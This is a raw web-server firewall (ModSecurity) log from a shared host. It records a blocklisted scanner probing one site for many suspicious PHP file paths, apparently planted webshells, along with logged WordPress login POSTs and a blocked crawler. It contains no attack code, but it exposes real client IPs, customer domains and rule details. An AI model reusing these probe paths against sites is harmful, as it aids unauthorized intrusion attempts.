[Tue May 26 14:45:04.406145 2026] [security2:error] [pid 636820:tid 637019] [client 20.151.130.61:41078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkmK_r6oOphPch7B-VQAAAAEU"]
[Tue May 26 14:45:04.502555 2026] [security2:error] [pid 636820:tid 637046] [client 20.151.130.61:41078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVkmK_r6oOphPch7B-VQgAAAGA"]
[Tue May 26 14:45:04.576299 2026] [security2:error] [pid 636820:tid 636959] [client 20.151.130.61:41078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkmK_r6oOphPch7B-VRAAAAAk"]
[Tue May 26 14:45:04.651463 2026] [security2:error] [pid 636820:tid 636995] [client 20.151.130.61:41078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/one.php"] [unique_id "ahVkmK_r6oOphPch7B-VRgAAAC0"]
[Tue May 26 14:45:04.651576 2026] [security2:error] [pid 636820:tid 636995] [client 20.151.130.61:41078] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/one.php"] [unique_id "ahVkmK_r6oOphPch7B-VRgAAAC0"]
[Tue May 26 14:45:04.816843 2026] [security2:error] [pid 636820:tid 637058] [client 20.151.130.61:40983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-temp.php"] [unique_id "ahVkmK_r6oOphPch7B-VSQAAAGw"]
[Tue May 26 14:45:04.816964 2026] [security2:error] [pid 636820:tid 637058] [client 20.151.130.61:40983] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-temp.php"] [unique_id "ahVkmK_r6oOphPch7B-VSQAAAGw"]
[Tue May 26 14:45:04.983474 2026] [security2:error] [pid 636820:tid 636981] [client 20.151.130.61:40985] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVkmK_r6oOphPch7B-VTwAAAB8"]
[Tue May 26 14:45:05.057397 2026] [security2:error] [pid 636820:tid 637010] [client 20.151.130.61:40985] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkma_r6oOphPch7B-VVQAAADw"]
[Tue May 26 14:45:05.140291 2026] [security2:error] [pid 636820:tid 637072] [client 20.151.130.61:40985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/xmu.php"] [unique_id "ahVkma_r6oOphPch7B-VWgAAAHo"]
[Tue May 26 14:45:05.140396 2026] [security2:error] [pid 636820:tid 637072] [client 20.151.130.61:40985] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/xmu.php"] [unique_id "ahVkma_r6oOphPch7B-VWgAAAHo"]
[Tue May 26 14:45:05.481203 2026] [security2:error] [pid 636820:tid 636965] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkma_r6oOphPch7B-VUwAAAA8"]
[Tue May 26 14:45:06.434161 2026] [security2:error] [pid 636820:tid 637046] [client 20.151.130.61:41053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/mode.php"] [unique_id "ahVkmq_r6oOphPch7B-VeQAAAGA"]
[Tue May 26 14:45:06.434296 2026] [security2:error] [pid 636820:tid 637046] [client 20.151.130.61:41053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/mode.php"] [unique_id "ahVkmq_r6oOphPch7B-VeQAAAGA"]
[Tue May 26 14:45:06.708081 2026] [security2:error] [pid 636820:tid 637029] [client 20.151.130.61:41060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-admin/js/index.php"] [unique_id "ahVkmq_r6oOphPch7B-VggAAAE8"]
[Tue May 26 14:45:06.708202 2026] [security2:error] [pid 636820:tid 637029] [client 20.151.130.61:41060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-admin/js/index.php"] [unique_id "ahVkmq_r6oOphPch7B-VggAAAE8"]
[Tue May 26 14:45:07.160942 2026] [security2:error] [pid 636820:tid 637022] [client 20.151.130.61:40994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/dx.php"] [unique_id "ahVkm6_r6oOphPch7B-ViwAAAEg"]
[Tue May 26 14:45:07.161052 2026] [security2:error] [pid 636820:tid 637022] [client 20.151.130.61:40994] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/dx.php"] [unique_id "ahVkm6_r6oOphPch7B-ViwAAAEg"]
[Tue May 26 14:45:07.576127 2026] [security2:error] [pid 636820:tid 637063] [client 20.151.130.61:40976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/puc.php"] [unique_id "ahVkm6_r6oOphPch7B-VnAAAAHE"]
[Tue May 26 14:45:07.576214 2026] [security2:error] [pid 636820:tid 637063] [client 20.151.130.61:40976] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/puc.php"] [unique_id "ahVkm6_r6oOphPch7B-VnAAAAHE"]
[Tue May 26 14:45:08.025729 2026] [security2:error] [pid 636820:tid 637027] [client 20.151.130.61:41069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/themes.php"] [unique_id "ahVknK_r6oOphPch7B-VtQAAAE0"]
[Tue May 26 14:45:08.025849 2026] [security2:error] [pid 636820:tid 637027] [client 20.151.130.61:41069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/themes.php"] [unique_id "ahVknK_r6oOphPch7B-VtQAAAE0"]
[Tue May 26 14:45:08.096658 2026] [security2:error] [pid 636820:tid 636967] [client 202.141.83.254:19763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVknK_r6oOphPch7B-VuQAAABE"]
[Tue May 26 14:45:08.096754 2026] [security2:error] [pid 636820:tid 636967] [client 202.141.83.254:19763] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVknK_r6oOphPch7B-VuQAAABE"]
[Tue May 26 14:45:08.365508 2026] [security2:error] [pid 636820:tid 636963] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkm6_r6oOphPch7B-VsAAAAA0"]
[Tue May 26 14:45:08.523870 2026] [security2:error] [pid 636820:tid 637018] [client 20.151.130.61:41043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/dx.php"] [unique_id "ahVknK_r6oOphPch7B-VwwAAAEQ"]
[Tue May 26 14:45:08.524008 2026] [security2:error] [pid 636820:tid 637018] [client 20.151.130.61:41043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/dx.php"] [unique_id "ahVknK_r6oOphPch7B-VwwAAAEQ"]
[Tue May 26 14:45:09.096482 2026] [security2:error] [pid 636820:tid 636981] [client 20.151.130.61:41025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/11.php"] [unique_id "ahVkna_r6oOphPch7B-V2AAAAB8"]
[Tue May 26 14:45:09.096614 2026] [security2:error] [pid 636820:tid 636981] [client 20.151.130.61:41025] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/11.php"] [unique_id "ahVkna_r6oOphPch7B-V2AAAAB8"]
[Tue May 26 14:45:09.328920 2026] [security2:error] [pid 636820:tid 636962] [client 20.151.130.61:41037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/p.php"] [unique_id "ahVkna_r6oOphPch7B-V4QAAAAw"]
[Tue May 26 14:45:09.329035 2026] [security2:error] [pid 636820:tid 636962] [client 20.151.130.61:41037] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/p.php"] [unique_id "ahVkna_r6oOphPch7B-V4QAAAAw"]
[Tue May 26 14:45:09.581570 2026] [security2:error] [pid 636820:tid 637020] [client 20.151.130.61:41047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/index.cgi"] [unique_id "ahVkna_r6oOphPch7B-V8gAAAEY"]
[Tue May 26 14:45:09.654607 2026] [security2:error] [pid 636820:tid 636966] [client 20.151.130.61:41047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/cgi-sys/404.html"] [unique_id "ahVkna_r6oOphPch7B-V8wAAABA"]
[Tue May 26 14:45:09.850960 2026] [security2:error] [pid 636820:tid 637024] [client 20.151.130.61:41047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/bthil.php"] [unique_id "ahVkna_r6oOphPch7B-V9gAAAEo"]
[Tue May 26 14:45:09.851073 2026] [security2:error] [pid 636820:tid 637024] [client 20.151.130.61:41047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/bthil.php"] [unique_id "ahVkna_r6oOphPch7B-V9gAAAEo"]
[Tue May 26 14:45:09.968350 2026] [security2:error] [pid 636820:tid 636992] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkna_r6oOphPch7B-V8AAAACo"]
[Tue May 26 14:45:10.358109 2026] [security2:error] [pid 636820:tid 636982] [client 20.151.130.61:41065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/7.php"] [unique_id "ahVknq_r6oOphPch7B-WBQAAACA"]
[Tue May 26 14:45:10.358234 2026] [security2:error] [pid 636820:tid 636982] [client 20.151.130.61:41065] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/7.php"] [unique_id "ahVknq_r6oOphPch7B-WBQAAACA"]
[Tue May 26 14:45:10.769532 2026] [security2:error] [pid 636820:tid 637005] [client 20.151.130.61:40973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/8.php"] [unique_id "ahVknq_r6oOphPch7B-WFwAAADc"]
[Tue May 26 14:45:10.769658 2026] [security2:error] [pid 636820:tid 637005] [client 20.151.130.61:40973] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/8.php"] [unique_id "ahVknq_r6oOphPch7B-WFwAAADc"]
[Tue May 26 14:45:11.126680 2026] [security2:error] [pid 636820:tid 637019] [client 20.151.130.61:41080] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/1.php"] [unique_id "ahVkn6_r6oOphPch7B-WJgAAAEU"]
[Tue May 26 14:45:11.126818 2026] [security2:error] [pid 636820:tid 637019] [client 20.151.130.61:41080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/1.php"] [unique_id "ahVkn6_r6oOphPch7B-WJgAAAEU"]
[Tue May 26 14:45:11.126936 2026] [security2:error] [pid 636820:tid 637019] [client 20.151.130.61:41080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/1.php"] [unique_id "ahVkn6_r6oOphPch7B-WJgAAAEU"]
[Tue May 26 14:45:11.377618 2026] [security2:error] [pid 636820:tid 637056] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVknq_r6oOphPch7B-WHwAAAGo"]
[Tue May 26 14:45:11.479547 2026] [security2:error] [pid 636820:tid 637038] [client 20.151.130.61:41051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/100.php"] [unique_id "ahVkn6_r6oOphPch7B-WMgAAAFg"]
[Tue May 26 14:45:11.479677 2026] [security2:error] [pid 636820:tid 637038] [client 20.151.130.61:41051] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/100.php"] [unique_id "ahVkn6_r6oOphPch7B-WMgAAAFg"]
[Tue May 26 14:45:11.810856 2026] [security2:error] [pid 636820:tid 637030] [client 20.151.130.61:41020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/about.php"] [unique_id "ahVkn6_r6oOphPch7B-WOwAAAFA"]
[Tue May 26 14:45:11.810966 2026] [security2:error] [pid 636820:tid 637030] [client 20.151.130.61:41020] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/about.php"] [unique_id "ahVkn6_r6oOphPch7B-WOwAAAFA"]
[Tue May 26 14:45:12.378229 2026] [security2:error] [pid 636820:tid 637028] [client 45.132.227.224:22581] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVknq_r6oOphPch7B-WGAAAAE4"]
[Tue May 26 14:45:12.664617 2026] [security2:error] [pid 636820:tid 637020] [client 20.151.130.61:41028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/admin.php"] [unique_id "ahVkoK_r6oOphPch7B-WYQAAAEY"]
[Tue May 26 14:45:12.664771 2026] [security2:error] [pid 636820:tid 637020] [client 20.151.130.61:41028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/admin.php"] [unique_id "ahVkoK_r6oOphPch7B-WYQAAAEY"]
[Tue May 26 14:45:13.410078 2026] [security2:error] [pid 636820:tid 636988] [client 20.151.130.61:41075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/edit.php"] [unique_id "ahVkoa_r6oOphPch7B-WgwAAACY"]
[Tue May 26 14:45:13.410238 2026] [security2:error] [pid 636820:tid 636988] [client 20.151.130.61:41075] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/edit.php"] [unique_id "ahVkoa_r6oOphPch7B-WgwAAACY"]
[Tue May 26 14:45:13.768043 2026] [security2:error] [pid 636820:tid 637022] [client 20.151.130.61:40982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-content/admin.php"] [unique_id "ahVkoa_r6oOphPch7B-WkAAAAEg"]
[Tue May 26 14:45:13.768171 2026] [security2:error] [pid 636820:tid 637022] [client 20.151.130.61:40982] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-content/admin.php"] [unique_id "ahVkoa_r6oOphPch7B-WkAAAAEg"]
[Tue May 26 14:45:13.876924 2026] [security2:error] [pid 636820:tid 637042] [client 66.146.238.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkoa_r6oOphPch7B-WlAAAAFw"], referer: https://www.anujtradingco.com/
[Tue May 26 14:45:14.020398 2026] [security2:error] [pid 636820:tid 637055] [client 20.151.130.61:40984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/f6.php"] [unique_id "ahVkoq_r6oOphPch7B-WmAAAAGk"]
[Tue May 26 14:45:14.020535 2026] [security2:error] [pid 636820:tid 637055] [client 20.151.130.61:40984] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/f6.php"] [unique_id "ahVkoq_r6oOphPch7B-WmAAAAGk"]
[Tue May 26 14:45:14.043619 2026] [security2:error] [pid 636820:tid 637060] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkoa_r6oOphPch7B-WjQAAAG4"]
[Tue May 26 14:45:15.196300 2026] [security2:error] [pid 636820:tid 636963] [client 66.146.238.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVko6_r6oOphPch7B-WtgAAAA0"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1234114&moderation-hash=6b57cf664c9a913734dbc9e82706e6c6
[Tue May 26 14:45:15.818570 2026] [security2:error] [pid 636820:tid 637049] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVko6_r6oOphPch7B-WvwAAAGM"]
[Tue May 26 14:45:16.341268 2026] [security2:error] [pid 636820:tid 636993] [client 85.208.96.203:65082] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVkpK_r6oOphPch7B-W3AAAACs"]
[Tue May 26 14:45:16.341514 2026] [security2:error] [pid 636820:tid 636993] [client 85.208.96.203:65082] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVkpK_r6oOphPch7B-W3AAAACs"]
[Tue May 26 14:45:16.505677 2026] [proxy:error] [pid 636820:tid 636965] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
